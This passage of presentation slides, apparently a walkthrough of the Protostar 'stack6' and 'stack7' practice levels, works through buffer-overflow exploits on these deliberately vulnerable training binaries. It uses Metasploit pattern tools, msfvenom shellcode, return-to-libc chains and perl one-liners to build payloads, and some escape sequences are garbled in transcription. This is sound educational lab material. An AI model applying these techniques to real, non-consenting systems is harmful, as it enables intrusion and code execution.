  • 28. Level 6 The Stack (Diagram 2) This address Address of SHELLCODE Address of SHELLCODE Address of FORMATSTRING Address of execl() Address of printf() Previously EIP Char buffer = 64 bytes Uninitalized stack space
  • 29. Level 6 (Solution 1) ./pattern_create.rb 100 [MSF Pattern] Gdb –-quiet ./stack6 Run Input path please:[MSF Pattern] got path [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x37634136 in ?? () ./pattern_offset.rb 0x37634136 80 msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true [SHELLCODE] ~ 80 bytes perl -e 'print "a"x80 . "xf0xf7xffxbf" . [SHELLCODE] | ./stack6 input path please: bzzzt (0xbffff7f0)
  • 30. Level 6 (Solution 2) gdb --quiet ./stack6 (gdb) break main Breakpoint 1 at 0x8048500: file stack6/stack6.c, line 27. (gdb) run Starting program: /opt/protostar/bin/stack6 Breakpoint 1, main (argc=1, argv=0xbffff864) (gdb) print printf $1 = {<text variable, no debug info>} 0xb7eddf90 <__printf> (gdb) print execl $2 = {<text variable, no debug info>} 0xb7f2e460 <*__GI_execl> export FORMATSTRING=”%3$n” export SHELLCODE=”/location/to/shellcodefile” ~/getenvaddr FORMATSTRING ./stack6 FORMATSTRING will be at 0xbffff9a7 ~/getenvaddr SHELLCODE ./stack6 SHELLCODE will be at 0xbffff9b6
  • 31. Level 6 (Solution 3) (Using altered stack6 binary) ~/stackx input path please: a 0xbffff75c got path a gdb --quiet ~/stackx (gdb) break getpath Breakpoint 1 at 0x804848a (gdb) run Starting program: /home/user/stackx Breakpoint 1, 0x0804848a in getpath () (gdb) x/4000s $esp … 0xbffff966: "/home/user/stackx" … 0xbfffffea: "/home/user/stackx"
  • 32. Level 6 (Solution 4) /home/user/stackx = 17 bytes /opt/protostar/bin/stack6 = 25 bytes Difference of = 8 bytes Shows twice in mem = 16 bytes total 80 x “a” = 80 bytes 20 for other addresses = 20 bytes Starting point of = 0xbffff75c perl -e 'printf("0x%08xn", 0xbffff75c + 20 + 80 + 16)' 0Xbffff7d0
  • 33. Level 6 (Solution 5) Printf = 0xB7EDDF90 Execl = 0xB7F2E460 $FORMATSTRING = 0xBFFFF9A8 $SHELLCODE = 0xBFFFF9B6 End of buffer (here) = 0XBFFFF7D0 BUFFER (80)| printf | execl | FORMATSTRING| SHELLCODE | SHELLCODE | here perl -e 'print "a"x80 . "x90xdfxedxb7" . "x60xe4xf2xb7" . "xa8xf9xffxbf" . "xb6xf9xffxbf"x2 . "xd0xf7xffxbf"' | ./stack6 Seg fault
  • 34. Level 7 (Source) char *getpath(){ char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xb0000000) == 0xb0000000{ printf("bzzzt (%p)n", ret); _exit(1); } printf("got path %sn", buffer); return strdup(buffer); } int main(int argc, char **argv){ getpath(); }
  • 35. Level 7 (Diagram) Address of SHELLCODE Previous Stack Frames Filler buffer = 8 bytes Containsof jmp, ESP ret Address EIP & jmp, Char buffer = 80 bytes Char buffer = 80 bytes Uninitalized stack space
  • 36. Level 7 (Solution 1) ./pattern_create.rb 100 [MSF Pattern] gdb –-quiet ./stack7 input path please: [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x37634136 in ?? () ./pattern_offset.rb 0x37634136 80
  • 37. Level 7 (Solution 2) scp [email protected]:/opt/protostar/bin/stack7 ~/stack7 msfelfscan -j edx ~/stack7 [~/stack7] msfelfscan -p ~/stack7 [~/stack7] 0x08048492 pop ebx; pop ebp; ret 0x080485c7 pop edi; pop ebp; ret 0x080485f7 pop ebx; pop ebp; ret
  • 38. Level 7 (Solution 3) perl -e 'print "a"x80 . "x92x84x04x08" . "c"x100' > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x63636363 in ?? () ./pattern_create.rb 50 [MSF Pattern] perl -e 'print "a"x80 . "x92x84x04x08" . "[MSF Pattern]”’ > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x33614132 in ?? ()
  • 39. Level 7 (Solution 4) ./pattern_offset.rb 0x33614132 8 perl -e 'print "a"x80 . "x92x84x04x08" . "C"x8 . "D"x4' > /tmp/7-test gdb --quiet ./stack7 (gdb) run < /tmp/7-test Starting program: /opt/protostar/bin/stack7 < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x44444444 in ?? () msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch /tmp/touch' PrependSet resuid=true [MSF Shellcode] export SHELLCODE=`perl -e 'print “[MSF Shellcode]"'` ~/getenvaddr SHELLCODE ./stack7 SHELLCODE will be at 0xbffff960
  • 40. Level 7 (Solution 4) perl -e 'print "a"x80 . "x92x84x04x08" . "C"x8 . "x60xf9xffxbf"' | ./stack7 input path please: got path aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a��aaaaaaaaaaaa��CCCCCCCC`��� ls /tmp/ touch
  • 41. Questions? Thanks! Exploit-exercises.com – Virtual machine creators Mattandreko.com - Tutorials Hacking: The Art of Exploitation – Jon Erickson